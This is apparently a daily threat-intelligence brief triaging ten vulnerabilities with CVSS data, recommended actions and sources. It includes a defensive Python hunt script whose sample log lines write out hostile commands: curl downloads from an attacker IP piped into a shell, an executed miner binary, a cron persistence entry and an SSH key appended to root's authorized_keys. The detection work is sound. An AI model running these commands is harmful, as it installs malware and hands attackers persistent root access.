ELEVATED · 4 min read · 1 Jul 2026

Langflow CVE-2026-33017 Leads Incident Response Queue as StoneFly and Citrix Drive Patch Routing

Today's intelligence is consolidated into 10 priority findings plus updates to ongoing stories. 19 further items tracked below.

Key findings
01 · Langflow RCE exploitation deploys Monero miner on exposed AI endpoints · MEDIUM
Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

02 · Red Hat JBoss EAP / Undertow WID-SEC-2026-0054 advisory reaches CERT-Bund · HIGH
CVSS 7.5 high · CWE-20 Improper Input Validation · EPSS 65th percentile. Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

03 · OFFIS DCMTK Toolkit path traversal affects healthcare imaging workflows · CRITICAL
CVSS 9.3 critical · CWE-22 Path Traversal. Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

04 · Fission podSpec injection enables Kubernetes node escape and cluster takeover · CRITICAL
CVSS 9.9 critical · CWE-269 Improper Privilege Management · EPSS 22nd percentile. Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

05 · StoneFly Storage Concentrator exposes unauthenticated root command execution · CRITICAL
CVSS 10 critical · CWE-78 OS Command Injection. Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

06 · Progress Kemp LoadMaster CVE-2026-8037 patch-release item re-promoted by sidecar · CRITICAL
CVSS 9.6 critical · CWE-77 Command Injection · EPSS 77th percentile. Classification: UPDATED (patch_released). Today's delta is the patch release. Treat this as a material update to an ongoing story, not as a new technical class.

07 · CVE-2026-8631 HPLIP arbitrary-code-execution fixes land in Ubuntu · CRITICAL
CVSS 9.3 critical · CWE-122 Heap-based Buffer Overflow · EPSS 68th percentile. Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

08 · Angular CVE-2025-66412 high-severity XSS update reaches CERT-Bund · HIGH
CVSS 8.5 high · CWE-79 Cross-site Scripting · EPSS 30th percentile. Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

09 · Frangoteam FUXA SCADA/HMI dot-segment bypass exposes users and roles · HIGH
CVSS 8.7 high · CWE-290 Authentication Bypass by Spoofing. Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

10 · AdonisJS bodyparser CVE-2026-48795 incomplete fix · HIGH
CVSS 8.6 high · CWE-1321 Prototype Pollution. Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Langflow RCE exploitation deploys Monero miner on exposed AI endpoints

Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation. Current exploitation reporting comes from The Hacker News and Trend Micro.

Recommended action: Treat exposed Langflow as incident-response scope; hunt for 83.142.209[.]214, lambsys, XMRig, cron persistence and SSH-key propagation.

Identifiers: CVE-2026-33017

Sources: [The Hacker News report](https://thehackernews.com/2026/06/langflow-rce-exploited-to-deploy-monero.html)
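The hunt list above names five indicator classes. The following is an added example, not code from this brief, from The Hacker News or from Trend Micro: a small rule set that runs those indicators over host log lines and groups the hits by class, so a responder can see at a glance which classes fired on a given host. The IP, the `lambsys` name and the XMRig reference are the brief's indicators; the log lines, the syslog-style format, the cron and `authorized_keys` patterns, and the function names `hunt` and `summarize` are all constructed assumptions for the example.

```python
"""Hunt helper for the Langflow / XMRig indicators named in this brief.

Added example: not code from the brief or from the cited reports. The
indicator classes (C2 IP, 'lambsys', XMRig, cron persistence, SSH-key
propagation) come from the brief; the log lines below are constructed and
the log formats are assumed, not taken from any real incident.
"""
import re
from collections import defaultdict

# The IP is stored defanged (as the brief prints it) and refanged only at
# match time, so the script itself carries no routable address.
C2_IP_DEFANGED = "83.142.209[.]214"
C2_IP = C2_IP_DEFANGED.replace("[.]", ".")

# One rule per indicator class in the brief's hunt list: (category, regex).
RULES = [
    ("c2_ip", re.compile(re.escape(C2_IP))),
    ("lambsys", re.compile(r"\blambsys\b", re.I)),
    # XMRig by name, or a stratum mining-pool URL in a process/command line
    ("xmrig", re.compile(r"\bxmrig\b|stratum\+tcp://", re.I)),
    # cron persistence: a crontab entry or cron daemon log line that fetches
    # with curl/wget and pipes the result into a shell (assumed pattern)
    ("cron_persistence",
     re.compile(r"(?:crontab|CRON).*?(?:curl|wget)[^|]*\|\s*(?:ba)?sh", re.I)),
    # SSH-key propagation: any touch of authorized_keys; matches benign
    # provisioning too, so hits in this class need triage, not auto-block
    ("ssh_key_propagation", re.compile(r"authorized_keys", re.I)),
]


def hunt(lines):
    """Return {category: [matching line, ...]} for every rule that fires."""
    hits = defaultdict(list)
    for line in lines:
        for category, pattern in RULES:
            if pattern.search(line):
                hits[category].append(line)
    return dict(hits)


# Constructed sample log lines (not real data): benign and indicator-bearing
# entries mixed, in an assumed syslog-style layout.
SAMPLE_LINES = [
    "Jun 30 01:02:03 ai-host langflow[4123]: POST /api/v1/validate/code 200",
    "Jun 30 01:02:09 ai-host langflow[4123]: GET /api/v1/flows 200",
    "Jun 30 01:02:11 ai-host sh[4190]: curl -fsSL http://83.142.209.214/lambsys -o /tmp/lambsys",
    "Jun 30 01:02:12 ai-host sh[4190]: chmod +x /tmp/lambsys; /tmp/lambsys",
    "Jun 30 01:02:20 ai-host lambsys[4201]: xmrig starting, pool stratum+tcp://83.142.209.214:3333",
    "Jun 30 01:02:25 ai-host CRON[4210]: (root) CMD (curl -s http://83.142.209.214/up.sh | sh)",
    "Jun 30 01:02:30 ai-host sh[4215]: echo 'ssh-ed25519 AAAA... x' >> /root/.ssh/authorized_keys",
    "Jun 30 01:05:00 ai-host CRON[4300]: (root) CMD (/usr/bin/logrotate /etc/logrotate.conf)",
]


def summarize(lines=SAMPLE_LINES):
    """Hit count per indicator class; an empty dict means nothing fired."""
    return {cat: len(matches) for cat, matches in hunt(lines).items()}


if __name__ == "__main__":
    for cat, matches in hunt(SAMPLE_LINES).items():
        print(f"[{cat}] {len(matches)} hit(s)")
        for m in matches:
            print("   ", m)
```

On the constructed sample every class fires: the C2 address appears in the download, the pool URL and the cron entry, which is the overlap that makes a single IP indicator useful across process, network and persistence telemetry. The `ssh_key_propagation` rule is deliberately broad; in a real environment it should be joined against provisioning change windows before it is treated as a finding.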

Red Hat JBoss EAP / Undertow WID-SEC-2026-0054 advisory reaches CERT-Bund

Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Route JBoss EAP and Undertow owners for fixed package validation.

Identifiers: WID-SEC-2026-0054 / CVE-2024-3884 / CVE-2025-12543 / CVE-2025-9784

Sources: [CERT-Bund WID-SEC-2026-0054](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0054)

OFFIS DCMTK Toolkit path traversal affects healthcare imaging workflows

Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Patch DCMTK and review C-GET storage mode in healthcare imaging workflows.

Identifiers: CVE-2026-50003

Sources: [CISA medical advisory](https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-181-01)

Fission podSpec injection enables Kubernetes node escape and cluster takeover

Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Update Fission to v1.24.0 and validate admission controls for privileged podSpec fields.

Identifiers: CVE-2026-50545 / CVE-2026-50563

Sources: [Fission release notes](https://github.com/fission/fission/releases/tag/v1.24.0); [GitHub advisory GHSA-wmgg-3p4h-48x7](https://github.com/advisories/GHSA-wmgg-3p4h-48x7); [GitHub advisory GHSA-v455-mv2v-5g92](https://github.com/advisories/GHSA-v455-mv2v-5g92)

StoneFly Storage Concentrator exposes unauthenticated root command execution

Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Patch or isolate Storage Concentrator / SCVM versions below fixed 8.0.4.x builds.

Identifiers: CVE-2026-56415 / CVE-2026-56413 / CVE-2026-50110

Sources: [CISA ICS advisory](https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-06)

Progress Kemp LoadMaster CVE-2026-8037 patch-release item re-promoted by sidecar

Classification: UPDATED (patch_released). Today's delta is the patch release. Treat this as a material update to an ongoing story, not as a new technical class.

Identifiers: CVE-2026-8037

Sources: [The Hacker News report](https://thehackernews.com/2026/06/progress-kemp-loadmaster-flaw-could-let.html)

CVE-2026-8631 HPLIP arbitrary-code-execution fixes land in Ubuntu

Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Update HPLIP packages where Linux endpoints or servers process untrusted print/document inputs.

Identifiers: CVE-2026-8631 / CVE-2026-8632 / USN-8483-1

Sources: [Ubuntu security notice](https://ubuntu.com/security/notices/USN-8483-1)

Angular CVE-2025-66412 high-severity XSS update reaches CERT-Bund

Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Route Angular application owners to confirm deployed versions and fixed advisory mapping.

Identifiers: CVE-2025-66412 / WID-SEC-2025-2708 / GHSA-V4HV-RGFQ-GP49

Sources: [CERT-Bund WID-SEC-2025-2708](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-2708)

Frangoteam FUXA SCADA/HMI dot-segment bypass exposes users and roles

Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Patch FUXA <=1.3.1 and restrict unauthenticated API paths.

Identifiers: CVE-2026-13207

Sources: [CISA ICS advisory](https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-02)

AdonisJS bodyparser CVE-2026-48795 incomplete fix

Classification: NEW. Newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Upgrade @adonisjs/bodyparser to 10.1.5 or 11.0.3 where multipart uploads are accepted.

Identifiers: CVE-2026-48795 / GHSA-qcm7-3vpr-hj5h

Sources: [GitHub advisory GHSA-qcm7-3vpr-hj5h](https://github.com/advisories/GHSA-qcm7-3vpr-hj5h); [AdonisJS bodyparser release notes](https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5); [AdonisJS bodyparser release notes](https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3)

Also tracked

  • CVE-2026-49432 Apache ActiveMQ reaches BSI broker-owner routing · CVE-2026-49432 · High
  • CVE-2026-49451 Microsoft.OpenAPI parser termination patched · CVE-2026-49451 · High
  • Sigstore Fulcio OIDC redirect handling can leak Kubernetes service-account tokens · CVE-2026-49478 · High
  • NCSC-NL routes Citrix NetScaler ADC/Gateway · CVE-2026-8451 · High
  • GNU gzip CVE-2026-41991 and CVE-2026-41992 reach MSRC · CVE-2026-41991 · Medium
  • Apple WebKit/iOS/macOS/Safari CVE-2026-43707 patch batch · CVE-2026-43707 · Medium
  • Sigstore Timestamp Authority unauthenticated requests can exhaust memory · CVE-2026-49835 · Medium
  • CVE-2026-50229 Apache Tomcat reaches BSI and CERT-FR routing · CVE-2026-50229 · Medium
  • MSRC libxml2 CVE-2026-11979 stack-based buffer overflow · CVE-2026-11979 · Low
  • CVE-2026-52747 OWASP ModSecurity bypass reaches BSI high queue · CVE-2026-52747 · Unknown
  • WID-SEC-2026-2136 Icinga high-severity multi-vulnerability advisory
  • WID-SEC-2026-2132 NATS Server high-severity multi-vulnerability advisory
  • WID-SEC-2026-2133 OpenClaw high-severity multi-vulnerability advisory
  • Phantom squatting uses AI-hallucinated domains as a software supply-chain vector
  • Bash parser tricks expand AI coding-agent supply-chain concern
  • Nissan discloses employee data breach linked to Oracle zero-day attacks
  • PeopleSoft/ShinyHunters campaign adds Nissan and NAIC named victims
  • Polymarket frontend supply-chain incident reaches Check Point reporting
  • Weekly recap patch/remediation sidecar item remains low-actionability
Tags: citrix · cve-2024-3884 · cve-2025-66412 · cve-2026-13207 · cve-2026-33017 · cve-2026-48795 · cve-2026-50003 · cve-2026-50545 · cve-2026-56415 · cve-2026-8037
